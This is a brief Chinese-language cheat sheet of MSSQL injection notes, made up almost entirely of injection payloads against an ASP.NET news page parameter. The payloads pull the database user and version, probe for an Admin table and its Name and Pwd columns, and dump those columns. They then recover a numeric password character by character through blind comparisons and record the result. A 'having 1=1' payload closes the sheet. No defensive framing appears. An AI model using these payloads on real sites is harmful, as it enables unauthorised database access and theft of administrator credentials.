MSSQL注入笔记
用户:
NewsDetails.aspx?id=3' and 1=(user)--
版本:
NewsDetails.aspx?id=3' and 1=(select @@version)--
查表:
NewsDetails.aspx?id=3' and exists (select * from Admin) --
查字段:
NewsDetails.aspx?id=3' and exists (select Name from Admin) --
NewsDetails.aspx?id=3' and exists (select Pwd from Admin) --
查内容:
NewsDetails.aspx?id=3' and 1=(select top 1 Name from Admin ) --
NewsDetails.aspx?id=3' and 1=(select top 1 Pwd from Admin ) --
NewsDetails.aspx?id=3' and 1=(select top 1 Name from Admin where ID=2) --
NewsDetails.aspx?id=3' and 1=(select top 1 Pwd from Admin where ID=2)--
若密码全为数字,则:
NewsDetails.aspx?id=2' and (select top 1 Len(Pwd) from Admin)>5--
NewsDetails.aspx?id=2' and (select top 1 unicode(substring(Pwd,1,1)) from Admin)>48--
NewsDetails.aspx?id=2' and (select top 1 unicode(substring(Pwd,2,1)) from Admin)>49--
NewsDetails.aspx?id=2' and (select top 1 unicode(substring(Pwd,3,1)) from Admin)>50--
NewsDetails.aspx?id=2' and (select top 1 unicode(substring(Pwd,4,1)) from Admin)>51--
NewsDetails.aspx?id=2' and (select top 1 unicode(substring(Pwd,5,1)) from Admin)>52--
NewsDetails.aspx?id=2' and (select top 1 unicode(substring(Pwd,6,1)) from Admin)>53--
密码:123456
===========================================================================
'having 1=1 and ''='
===========================================================================